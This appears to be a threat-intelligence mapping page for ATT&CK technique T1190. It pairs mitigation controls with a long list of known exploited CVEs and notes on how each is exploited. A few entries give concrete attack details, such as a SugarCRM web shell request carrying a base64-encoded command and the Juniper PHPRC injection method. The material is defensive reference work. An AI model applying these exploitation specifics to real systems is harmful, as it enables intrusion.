T1190 Exploit Public-Facing Application

Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.

Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve Exploitation for Defense Evasion or Exploitation for Client Execution.

If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the Cloud Instance Metadata API), exploit container host access via Escape to Host, or take advantage of weak identity and access management policies.

Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)

For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)

View in MITRE ATT&CK®

CRI Profile Mappings

Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
PR.AA-05.03 Service accounts Mitigates T1190 Exploit Public-Facing Application
Comments
This diagnostic statement is for the implementation of security controls for service accounts (i.e., accounts used by systems to access other systems). Use least privilege for service accounts to limit what permissions the exploited process gets on the rest of the system.
References
    PR.AA-05.02 Privileged system access Mitigates T1190 Exploit Public-Facing Application
    Comments
    This diagnostic statement protects against Exploit Public-Facing Application through the use of privileged account management and the use of multi-factor authentication.
    References
      DE.CM-06.02 Third-party access monitoring Mitigates T1190 Exploit Public-Facing Application
      Comments
      This diagnostic statement protects against Exploit Public-Facing Application through the use of privileged account management. Employing auditing, privilege access management, and just in time access protects against adversaries trying to obtain illicit access to critical systems.
      References
        PR.PS-06.05 Testing and validation strategy Mitigates T1190 Exploit Public-Facing Application
        Comments
        This particular diagnostic statement highlights the use of software security testing, code integrity verifications, and vulnerability scanning to mitigate security weaknesses and vulnerabilities in developed code or applications that an adversary may be able to take advantage of.
        References
          ID.RA-01.03 Vulnerability management Mitigates T1190 Exploit Public-Facing Application
          Comments
          This diagnostic statement provides protection from vulnerabilities in exposed applications from across the organization through the use of tools that scan for and review vulnerabilities along with patch management and remediation of those vulnerabilities.
          References
            PR.PS-02.01 Patch identification and application Mitigates T1190 Exploit Public-Facing Application
            Comments
            This diagnostic statement is related to the implementation of a patch management program. Applying patches and upgrades for products and systems provided by vendors mitigates the risk of adversaries exploiting known vulnerabilities. For example, updating software regularly by employing patch management for internal enterprise endpoints and servers can help prevent adversary exploitation of a weakness in an Internet-facing host or system to initially access a network.
            References
              PR.PS-06.06 Vulnerability remediation Mitigates T1190 Exploit Public-Facing Application
              Comments
              This diagnostic statement provides for identifying and remediating vulnerabilities as part of the SDLC. Ensuring software is up-to-date with the latest security patches helps prevent adversaries from exploiting known vulnerabilities, reducing the risk of successful attacks.
              References
                PR.PS-05.02 Mobile code prevention Mitigates T1190 Exploit Public-Facing Application
                Comments
                Mobile code procedures address specific actions taken to prevent the development, acquisition, and introduction of unacceptable mobile code within organizational systems, including requiring mobile code to be digitally signed by a trusted source.
                References
                  DE.CM-03.03 Privileged account monitoring Mitigates T1190 Exploit Public-Facing Application
                  Comments
                  This diagnostic statement implements mechanisms and tools to mitigate potential misuse of privileged users and accounts. Continuous monitoring of role and attribute assignments and activity is essential to prevent and detect unauthorized access or misuse.
                  References
                    EX.DD-04.01 Third-party systems and software evaluation Mitigates T1190 Exploit Public-Facing Application
                    Comments
                    This diagnostic statement describes the organization's formal process for evaluating externally-sourced applications, software, and firmware by assessing compatibility, security, integrity, and authenticity before deployment and after major changes. For example, requiring the use of vulnerability scanning of third-party application development to scan for common vulnerabilities like SQL injection or cross-site scripting (XSS), including the use of regular scans post major changes to identify newly introduced vulnerabilities.
                    References
                      PR.IR-01.01 Network segmentation Mitigates T1190 Exploit Public-Facing Application
                      Comments
                      This diagnostic statement is for the implementation of network segmentation which helps prevent access to critical systems and sensitive information. Segment externally facing servers and services to mitigate exploitation of public-facing applications.
                      References
                        PR.PS-01.09 Virtualized end point protection Mitigates T1190 Exploit Public-Facing Application
                        Comments
                        The diagnostic statement highlights several mechanisms that organizations can implement to protect endpoint systems using virtualization technologies. Virtualization technologies provide a layer of isolation and containment to isolate and contain the impact of potential compromises. Application isolation will limit what other processes and system features the exploited target can access, thus aiding with mitigations related to exploiting public facing applications.
                        References
                          PR.IR-01.06 Production environment segregation Mitigates T1190 Exploit Public-Facing Application
                          Comments
                          This diagnostic statement provides protections for production environments. Measures such as network segmentation and access control reduce the attack surface, restrict movement by adversaries, and protect critical assets and data from compromise.
                          References
                            PR.PS-01.08 End-user device protection Mitigates T1190 Exploit Public-Facing Application
                            Comments
                            This diagnostic statement protects against Exploit Public-Facing Application through the use of limiting access to resources to only authorized devices, management of personal computing devices, network intrusion prevention, and the use of antimalware.
                            References

                              NIST 800-53 Mappings

                              Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
                              CA-07 Continuous Monitoring mitigates T1190 Exploit Public-Facing Application
                              CM-06 Configuration Settings mitigates T1190 Exploit Public-Facing Application
                              CM-05 Access Restrictions for Change mitigates T1190 Exploit Public-Facing Application
                              IA-08 Identification and Authentication (Non-Organizational Users) mitigates T1190 Exploit Public-Facing Application
                              CA-02 Control Assessments mitigates T1190 Exploit Public-Facing Application
                              SC-29 Heterogeneity mitigates T1190 Exploit Public-Facing Application
                              RA-10 Threat Hunting mitigates T1190 Exploit Public-Facing Application
                              SC-30 Concealment and Misdirection mitigates T1190 Exploit Public-Facing Application
                              SC-18 Mobile Code mitigates T1190 Exploit Public-Facing Application
                              SC-02 Separation of System and User Functionality mitigates T1190 Exploit Public-Facing Application
                              SC-03 Security Function Isolation mitigates T1190 Exploit Public-Facing Application
                              SC-39 Process Isolation mitigates T1190 Exploit Public-Facing Application
                              SI-02 Flaw Remediation mitigates T1190 Exploit Public-Facing Application
                              RA-05 Vulnerability Monitoring and Scanning mitigates T1190 Exploit Public-Facing Application
                              CM-08 System Component Inventory mitigates T1190 Exploit Public-Facing Application
                              SC-46 Cross Domain Policy Enforcement mitigates T1190 Exploit Public-Facing Application
                              SI-10 Information Input Validation mitigates T1190 Exploit Public-Facing Application
                              SI-03 Malicious Code Protection mitigates T1190 Exploit Public-Facing Application
                              SI-07 Software, Firmware, and Information Integrity mitigates T1190 Exploit Public-Facing Application
                              SA-08 Security and Privacy Engineering Principles mitigates T1190 Exploit Public-Facing Application
                              IA-02 Identification and Authentication (Organizational Users) mitigates T1190 Exploit Public-Facing Application
                              CM-07 Least Functionality mitigates T1190 Exploit Public-Facing Application
                              SI-04 System Monitoring mitigates T1190 Exploit Public-Facing Application
                              AC-02 Account Management mitigates T1190 Exploit Public-Facing Application
                              AC-03 Access Enforcement mitigates T1190 Exploit Public-Facing Application
                              AC-04 Information Flow Enforcement mitigates T1190 Exploit Public-Facing Application
                              AC-05 Separation of Duties mitigates T1190 Exploit Public-Facing Application
                              AC-06 Least Privilege mitigates T1190 Exploit Public-Facing Application
                              SC-07 Boundary Protection mitigates T1190 Exploit Public-Facing Application

                              Known Exploited Vulnerabilities Mappings

                              Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
                              CVE-2024-34102 Adobe Commerce and Magento Open Source Improper Restriction of XML External Entity Reference (XXE) Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited by sending a crafted XML document that references external entities with the likely goal of accessing local data.
                              References
                              CVE-2021-22893 Ivanti Pulse Connect Secure Use-After-Free Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited through an authentication bypass weakness in the Windows File Share Browser and Pulse Secure Collaboration features of Pulse Connect Secure. Remote attackers leverage this vulnerability to perform remote arbitrary code execution on the Pulse Connect Secure gateway by bypassing authentication controls. The threat actor group UNC2630 has utilized this flaw to harvest login credentials, allowing them to move laterally within affected environments.
                              References
                              CVE-2022-29464 WSO2 Multiple Products Unrestrictive Upload of File Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2022-29464 is an unrestricted file upload vulnerability where an adversary can upload arbitrary files and, due to a directory traversal issue, write files to locations where they can then send commands. Adversaries have been seen to use this to mine cryptocurrency.
                              References
                              CVE-2021-3129 Laravel Ignition File Upload Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited when a remote unauthorized user sends a malicious payload to a server using an insecure version of Ignition. The payload targets the MakeViewVariableOptionalSolution.php module, leveraging insecure PHP functions file_get_contents and file_put_contents to specify a file path for executing arbitrary code.
                              References
                              CVE-2021-27860 FatPipe WARP, IPVPN, and MPVPN Configuration Upload exploit exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2021-27860 is a vulnerability in the web management interface in FatPipe software. The vulnerability allowed APT actors to gain access to an unrestricted file upload function to drop a webshell for exploitation activity with root access, leading to elevated privileges and potential follow-on activity. Exploitation of this vulnerability then served as a jumping off point into other infrastructure for the APT actors.
                              References
                              CVE-2021-22005 VMware vCenter Server File Upload Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited by an adversary who can access the vCenter Server over the network. The adversary uploads a crafted file to the server's analytics service via port 443, exploiting the file upload vulnerability. This results in remote code execution on the host. Threat actors have been observed leveraging this vulnerability, identified as CVE-2021-22005, using code released by security researcher Jang, to gain unauthorized access to vCenter servers.
                              References
                              CVE-2018-15961 Adobe ColdFusion Unrestricted File Upload Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              CVE-2023-48788 Fortinet FortiClient EMS SQL Injection Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This is an SQL injection vulnerability that can be exploited to execute remote code via specially crafted HTTP requests. Adversaries have been observed using this exploit to deploy tools on the target machine.
                              References
                              CVE-2023-34362 Progress MOVEit Transfer SQL Injection Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2023-34362 is a SQL injection vulnerability in a public-facing application. Adversaries have been observed to exploit this vulnerability to install malicious software on a target system, enabling them to discover system settings and information, enumerate the underlying SQL database, retrieve files, create administrator accounts, and delete accounts.
                              References
                              CVE-2025-25257 Fortinet FortiWeb SQL Injection Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              Affected versions of FortiWeb contain insufficient input sanitization, allowing for an attacker to use SQL injection to write a malicious .pth file to the into FortiWeb's site-packages Python directory. This allows the malicious code to execute using the privileges granted to Python scripts in that high-level directory.
                              References
                              CVE-2024-21893 Ivanti Connect Secure, Policy Secure, and Neurons Server-Side Request Forgery (SSRF) Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited through a Server-Side Request Forgery (SSRF) weakness in the SAML component of Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti Neurons for ZTA. Attackers leverage this vulnerability to gain unauthorized access by sending a crafted request to the /dana-ws/saml.ws endpoint, which can be accessed without authentication. This manipulation allows attackers to interact with internal services, potentially enabling further exploitation by chaining with other vulnerabilities.
                              References
                              CVE-2021-27103 Accellion FTA Server-Side Request Forgery (SSRF) Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2021-27103 is a server-side request forgery vulnerability in Accellion File Transfer Appliance in Accellion that allows an adversary to manipulate server requests via a crafted POST request.
                              References
                              CVE-2021-21975 VMware Server Side Request Forgery in vRealize Operations Manager API exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This Server-Side Request Forgery (SSRF) vulnerability is exploited by an attacker with network access to the VMware server. This vulnerability enables the attacker to exploit an unauthenticated endpoint to send crafted requests to internal or external systems. By doing so, the attacker can potentially steal administrative credentials. Once these credentials are compromised, the attacker could gain maximum privileges within the application, enabling them to alter configurations and intercept sensitive data. This exploitation could lead to unauthorized access and manipulation of the application.
                              References
                              CVE-2021-21973 VMware vCenter Server and Cloud Foundation Server Side Request Forgery (SSRF) Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited through an SSRF (Server Side Request Forgery) flaw in the vSphere Client (HTML5) of VMware's vCenter Server, affecting the vCenter Server plugin. Attackers leverage this vulnerability to gain unauthorized access by sending a crafted POST request to the vCenter Server plugin, thereby bypassing URL validation. This manipulation enables the disclosure of sensitive information. By exploiting this flaw, attackers can scan the company's internal network and retrieve specifics about open ports and services.
                              References
                              CVE-2025-34028 Commvault Command Center Path Traversal Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              Due to an issue with deployWebpackage.do, Commvault Command Center is vulnerable to SSRF attacks due to flawed host filtering, which an attacker can exploit to achieve remote code execution using malicious archives with .jsp files in them.
                              References
                              CVE-2023-27524 Apache Superset Insecure Default Initialization of Resource Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited by a remote attacker who forges a session cookie leveraging user_id or _user_id set to 1 in order to log in as an administrator. A successful exploitation could allow the adversary to gain authenticated access and gain access to unauthorized resources.
                              References
                              CVE-2023-20198 Cisco IOS XE Web UI Privilege Escalation Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited through improper access control in the Web User Interface feature of Cisco IOS XE software. Attackers first used this vulnerability to gain initial access by issuing a privilege level 15 command, which allowed them to create a local user account with a password.
                              References
                              CVE-2021-34523 Microsoft Exchange Server Privilege Escalation Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This privilege escalation vulnerability can be exploited by sending a specially crafted HTTP request to the exchange server, is it often chained together with CVE-2021-34473, a remote code execution vulnerability.
                              References
                              CVE-2023-44487 HTTP/2 Rapid Reset Attack Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited through a 'Rapid Reset' flaw in HTTP/2 endpoints. Attackers initiate this vulnerability by sending a crafted sequence of HTTP requests using HEADERS followed by RST_STREAM frames. This allows them to generate substantial traffic on targeted servers, significantly increasing CPU usage and leading to resource exhaustion without authentication.
                              References
                              CVE-2023-36845 Juniper Junos OS EX Series and SRX Series PHP External Variable Modification Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited through a PHP External Variable Modification flaw in the J-Web interface of Juniper Networks Junos OS, affecting EX Series switches and SRX Series firewalls. Attackers leverage this vulnerability to gain initial access by crafting a request that sets the PHPRC variable, thereby altering the PHP execution environment. This manipulation enables the injection and execution of arbitrary code. By exploiting the auto_prepend_file and allow_url_include PHP features, attackers can include a base64 encoded PHP payload using the data:// wrapper. This method allows them to execute code within a confined FreeBSD jail environment, with the potential to escalate privileges by stealing authentication tokens from a user logged into the J-Web application, ultimately enabling unauthorized SSH access with elevated privileges.
                              References
                              CVE-2023-36844 Juniper Junos OS EX Series PHP External Variable Modification Vulnerability primary_impact T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited through a PHP External Variable Modification flaw in the J-Web component of Juniper Networks Junos OS on EX Series devices. Attackers first use this vulnerability to gain control over certain environment variables by sending a crafted request, which allows them to manipulate these variables without authentication.
                              References
                              CVE-2022-20821 Cisco IOS XR Open Port Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited by an unauthenticated, remote user who can access the Redis instance via port 6379 due to a health check RPM issue in IOS XR software. A successful exploitation of this vulnerability could allow an attacker the ability to write to the Redis in-memory database, write arbitrary files to the file system, or retrieve information about the Redis database. This vulnerability has been identified as being exploited in the wild, but specific details have not been released.
                              References
                              CVE-2024-38475 Apache HTTP Server Improper Escaping of Output Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              Improper escaping in Apache HTTP Server versions 2.4.59 and before permits code execution or disclosure of source code, as well as session hijacking and a potential full system compromise. An attacker can use a crafted URL to perform a traversal attack to trick the Apache server into reading sensitive files.
                              References
                              CVE-2023-48365 Qlik Sense HTTP Tunneling Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability stems from improper HTTP header validation, if exploited, allows for remote code execution on affected devices.
                              References
                              CVE-2025-35939 Craft CMS External Control of Assumed-Immutable Web Parameter Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability allows an attacker to write arbitrary files to a known location on the target server, including potentially malicious files such as PHP scripts by leveraging the fact that Craft CMS creates session files for unauthenticated users at the login page. However, this vulnerability does not, by itself, cause any scripts to be executed or any information to be accessed, so it would need to be chained with another vulnerability in order to achieve code execution.
                              References
                              CVE-2024-4577 PHP-CGI OS Command Injection Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2024-4577 is a PHP argument injection vulnerability that allows an adversary to execute arbitrary php commands. Threat actors have been observed utilizing Cobalt Strike and the TaoWu toolkit for post-exploitation activities, such as conducting reconnaisance, establishing persistence, escalating privileges to SYSTEM level, and harvesting credentials.
                              References
                              CVE-2024-21887 Ivanti Connect Secure and Policy Secure Command Injection Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited through a command injection weakness in the web components of Ivanti Connect Secure and Ivanti Policy Secure. Attackers leverage this vulnerability to achieve remote code execution by sending specially crafted requests to vulnerable instances, potentially without requiring authentication when combined with other vulnerabilities. This manipulation allows attackers to execute arbitrary commands on the appliance, potentially enabling further exploitation and system compromise. Threat actors have been reported as likely targeting credentials and the deployment of web shells to provide future access.
                              References
                              CVE-2023-20887 Vmware Aria Operations for Networks Command Injection Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited by a remote, unauthenticated actor to gain remote code execution via a command injection attack. This vulnerability has been exploited in the wild; however, technical details have not been publicly shared.
                              References
                              CVE-2022-36804 Atlassian Bitbucket Server and Data Center Command Injection Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability allows remote attackers with read permissions to a public or private Bitbucket repositories to execute arbitrary code by sending a malicious HTTP request.
                              References
                              CVE-2021-27104 Accellion FTA OS Command Injection Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2021-27104 is an operating system command injection vulnerability in Accellion File Transfer Appliance in that allows an adversary to execute commands by sending a specially crafted POST request to the product's administrative endpoint.
                              References
                              CVE-2021-27102 Accellion FTA OS Command Injection Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2021-27102 is an operating system command execution vulnerability in Accellion File Transfer Appliance that allows an adversary to execute arbitrary commands via a local web service call.
                              References
                              CVE-2023-33246 Apache RocketMQ Command Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited by a remote attacker who leverages a command injection flaw in Apache RocketMQ versions 5.1 and lower. By using the update configuration function, the adversary can execute commands as the system user under which RocketMQ is running. This lack of permission verification in components like NameServer, Broker, and Controller, which are exposed on the extranet, allows for remote command execution. Additionally, attackers can forge RocketMQ protocol content to achieve the same effect. Since at least June 2023, threat actors have actively exploited this vulnerability to gain initial access and deploy the DreamBus botnet, a Linux-based malware.
                              References
                              CVE-2025-1316 Edimax IC-7100 IP Camera OS Command Injection Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              Due to improper input sanitization, the web interface of the Edimax IC-7100 contains a vulnerability that allows for a user to send a crafted HTTP request containing a malicious command(s), which the camera's OS can be forced to execute.
                              References
                              CVE-2023-27997 Fortinet FortiOS and FortiProxy SSL-VPN Heap-Based Buffer Overflow Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This buffer overflow vulnerability allows adversaries to remotely execute arbitrary code via specially crafted requests. Adversaries have been observed adding accounts to config files
                              References
                              CVE-2022-42475 Fortinet FortiOS Heap-Based Buffer Overflow Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2022-42475 is a remotely-expoitable heap overflow vulnerability. Adversaries have been observed exploiting this vulnerability to deliver malicious software to the target device. This malicious software has observed anti-debugging and command and control capabilities (over HTTP).
                              References
                              CVE-2022-20708 Cisco Small Business RV Series Routers Stack-based Buffer Overflow Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited by bypassing user authentication mechanisms via a lack of proper validation of a user-supplied string before executing a system call. This could grant adversaries root access to execute arbitrary code.
                              References
                              CVE-2022-20700 Cisco Small Business RV Series Routers Stack-based Buffer Overflow Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited by a remote attacker who sends specific commands to a Cisco router that does not have sufficient authorization enforcement mechanisms in place. This could allow the remote attacker to gain root privileges and execute arbitrary commands on the system.
                              References
                              CVE-2020-29557 D-Link DIR-825 R1 Devices Buffer Overflow Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2020-29557 is a buffer overflow vulnerability in the web interface allows attackers to achieve pre-authentication remote code execution. Unidentified threat actors are reported to have been actively exploiting it to co-opt them to a Mirai-variant botnet used for carrying out DDoS attacks, merely two days after its public disclosure.
                              References
                              CVE-2018-6789 Exim Buffer Overflow Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2018-6789 is a vulnerability in Exim, an open-source mail transfer agent. This vulnerability, identified as an off-by-one buffer overflow, allows attackers to execute arbitrary code remotely by sending specially crafted messages to the SMTP listener.
                              References
                              CVE-2025-22457 Ivanti Connect Secure, Policy Secure, and ZTA Gateways Stack-Based Buffer Overflow Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              Ivanti Connect Secure, Pulse Connect Secure, Ivanti Policy Secure, and ZTA Gateways products running old versions are susceptible to a stack-based buffer overflow exploit that can lead to remote code execution. The patched versions of each product that remove this vulnerability are as follows: Ivanti Connect Secure (22.7R2.6), Pulse Connect Secure (22.7R2.6), Ivanti Policy Secure (22.7R1.4), and ZTA Gateways (22.8R2.2).
                              References
                              CVE-2025-0282 Ivanti Connect Secure, Policy Secure, and ZTA Gateways Stack-Based Buffer Overflow Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability in Ivanti products is version-specific, requiring any reconaissance efforts to return the exact version before exploiting. If exploited, attackers may gain the ability to execute arbitrary code and harvest credentials from the compromised device. Additionally, they may perform internal reconaissance to find additional devices on the network to compromise.
                              References
                              CVE-2025-42599 Qualitia Active! Mail Stack-Based Buffer Overflow Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This stack-based buffer overflow vulnerability in Active! mail allows an unauthenticated attacker to achieve remote code execution, as well as execute a denial of service attack by crashing the server.
                              References
                              CVE-2023-7101 Spreadsheet::ParseExcel Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited by a remote attacker by passing unvalidated input from a file into a string-type "eval". Specifically, the issue stems from the evaluation of Number format strings (not to be confused with printf-style format strings) within the Excel parsing logic. After successful exploitation, the attacker gains the ability to perform remote code execution. This vulnerability has been targeted by Chinese hackers who exploited the vulnerability in Spreadsheet::ParseExcel to compromise appliances. In collaboration with cybersecurity firm Mandiant, Barracuda assesses that the threat actor behind the attacks is UNC4841, who leveraged the flaw to deploy ‘SeaSpy’ and ‘Saltwater’ malware.
                              References
                              CVE-2023-22952 Multiple SugarCRM Products Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This Remote Code Execution (RCE) vulnerability is exploited by an unauthenticated attacker via a crafted request can inject custom PHP code through the EmailTemplates because of missing input validation. This vulnerability has been exploited by threat actors to gain initial access to AWS accounts by injecting custom PHP code through the SugarCRM email templates module. Attackers leveraged misconfigurations to expand their access, obtaining long-term AWS access keys from compromised EC2 instances. They used tools like Pacu and Scout Suite to explore AWS services such as EC2, IAM, RDS, and S3, and gathered account information via AWS Organizations and Cost and Usage services. The attackers moved laterally by creating RDS snapshots and new EC2 instances, modifying security groups, and attempting to escalate privileges by logging in as the Root user. They also employed defense evasion techniques, including deploying resources in non-standard regions and intermittently stopping EC2 instances to avoid detection and minimize costs. The exploit in question is actively being used to compromise hosts by installing a PHP-based web shell. It involves an authentication bypass against the "/index.php" endpoint of the targeted service. Once bypassed, the attacker obtains a cookie and sends a secondary POST request to "/cache/images/sweet.phar" to upload a small PNG-encoded file containing PHP code. This file acts as a web shell, allowing the execution of commands specified in the base64-encoded query argument "c". For example, a request like 'POST /cache/images/sweet.phar?c="L2Jpbi9pZA=="' would execute the command "/bin/id" with the same permissions as the web service's user.
                              References
                              CVE-2023-0669 Fortra GoAnywhere MFT Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited through a cross-site request forgery (CSRF) flaw in GoAnywhere's license installation process. Attackers initiate this vulnerability by leveraging the absence of CSRF protection, allowing them to execute remote code without authentication. This enables them to compromise targeted systems, facilitating ransomware attacks and unauthorized access. This vulnerability has been actively exploited, leading to ransomware attacks by the Clop group.
                              References
                              CVE-2022-47966 Zoho ManageEngine Multiple Products Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2022-47966 is a remote code execution vulnerability that affects many ManageEngine products due to misconfiguration of security features. Adversaries can utilized this vulnerability to run arbitrary java. APTs have been observed exploiting this vulnerability to gain access, to public-facing applications, establish persistence, and move laterally. They've also been observed to create local user accounts with administrative privileges, use valid but disabled user accounts, delete logs, establish command and control communications, ... **the list goes on and on due to fantastic, detailed reporting**
                              References
                              CVE-2022-42948 Fortra Cobalt Strike User Interface Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited by a remote, unauthenticated attacker. The vulnerability is caused by improper escaping of HTML tags in Swing components. This flaw allows the attacker to inject crafted HTML code, enabling them to execute code within the Cobalt Strike UI. Exploitation can occur through a graphical file explorer menu, allowing attackers to perform unauthorized operations on the administrative interface.
                              References
                              CVE-2022-35914 Teclib GLPI Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited by a remote, unauthenticated attacker via /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module for GLPI through 10.0.2, which allows PHP code injection. in the wild exploitation details have not been publicly released for this vulnerability
                              References
                              CVE-2022-28810 Zoho ManageEngine ADSelfService Plus Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2022-28810 is a vulnerability that exists when custom password sync scripts are enabled when an adversary passes commands in the password field that can lead to remote code execution.
                              References
                              CVE-2022-26501 Veeam Backup & Replication Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited by a remote, unauthenticated attacker to access internal API functions and send malicious code to the Veeam Distribution Service via the default TCP port 9380. This vulnerability has been exploited by threat actors associated with the AvosLocker ransomware. Kroll analysts have observed these actors using this vulnerability, alongside CVE-2022-26500, to potentially exfiltrate data and download malicious tools while appearing as legitimate activity to evade detection.
                              References
                              CVE-2022-26500 Veeam Backup & Replication Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited by a remote, authenticated users access to internal API functions that allows attackers to upload and execute arbitrary code. This vulnerability has been exploited by threat actors associated with AvosLocker ransomware, as identified by Kroll analysts. These actors have developed new tactics targeting backup systems, specifically leveraging vulnerabilities in Veeam Backup and Replication software (CVE-2022-26500 and CVE-2022-26501) to potentially exfiltrate data while evading detection.
                              References
                              CVE-2022-26258 D-Link DIR-820L Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This remote command execution vulnerability is exploited by an adversary via HTTP POST to get set ccp. The exploit targets a command injection vulnerability in the /lan.asp component. The component does not successfully sanitize the value of the HTTP parameter DeviceName, which in turn can lead to arbitrary command execution. Adversaries have leveraged this vulnerability to spread a variant of Mirai botnet called MooBot to cause a distributed denial of service attack.
                              References
                              CVE-2022-26134 Atlassian Confluence Server and Data Center Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited by placing a payload in the URI of an HTTP request to a public-facing server.
                              References
                              CVE-2022-22965 Spring Framework JDK 9+ Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This remote code execution (RCE) vulnerability affects Spring MVC or Spring WebFlux applications running on JDK 9+ when deployed on Tomcat as a WAR file. This vulnerability can be exploited by a remote attacker via data binding, allowing malicious actors to execute arbitrary code. Specifically, it has been used to deploy and execute the Mirai botnet malware. The exploit involves downloading a Mirai sample to the "/tmp" directory and changing its permissions to make it executable using "chmod." The malware is then executed, enabling further malicious activities. The vulnerability does not affect applications deployed as Spring Boot executable jars. Observations of this exploit began in early April 2022, with malware variants available for different CPU architectures.
                              References
                              CVE-2022-22963 VMware Tanzu Spring Cloud Function Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              In certain versions of Spring Cloud Function, a vulnerability allows remote code execution through a specially crafted Spring Expression Language (SpEL) routing expression. This vulnerability, known as "Spring4Shell," can be exploited by sending crafted queries to a server running the Spring Core framework. Hackers are actively exploiting this flaw to execute malicious Java code on vulnerable servers. Initial exploit attempts were observed targeting a honeypot on port 9001. The exploit modifies logging configurations to create a webshell by writing code to a log file, which is then executed via a browser. Although there is scanning activity for vulnerable hosts, the exploitation is less widespread compared to Log4Shell, as it requires specific conditions beyond just using the framework.
                              References
